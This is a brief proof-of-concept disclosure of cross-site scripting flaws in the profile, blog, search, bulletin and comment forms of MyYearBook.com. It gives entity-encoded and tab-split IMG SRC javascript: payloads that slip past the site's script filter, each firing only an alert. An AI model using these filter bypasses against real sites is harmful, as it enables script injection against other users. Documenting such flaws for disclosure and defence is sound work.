MyYearBook.com - XSS



MyYearBook.com - Personal community site like myspace.com

Effected files:

Input forms of:

editing profile
posting a blog
search boxes
posting a bulletin
posting a comment

---------------------------

XSS Vulnerabilities proof of concept:

When editing your profile, it seems <script> tags are filtered to <notallowed> tags, and javascript is filtered to the word not allowed. To by pass this we can convert the script tags or the word javascript by using hex encoding. Below are following examples of places where user submitted data isn't properlly filtered before being dynamically generated.


Profile input:

All the user has to do is put the following in any input box in his profile: <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>


Blog subject input:

<IMG SRC="jav&#x09;ascript:alert('XSS');">

Photo caption input:

Same as above.
<IMG SRC="jav&#x09;ascript:alert('XSS');">


Any search box input:

"><IMG SRC="jav&#x09;ascript:alert('XSS');"><"

Posting a bulletin input:

In the message input box the following works:

<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>


Posting a comment:

<IMG SRC="jav ascript:alert('XSS');">

Make sure tab is enabled.

------------------------------------------------

Luny - http://www.youfucktard.com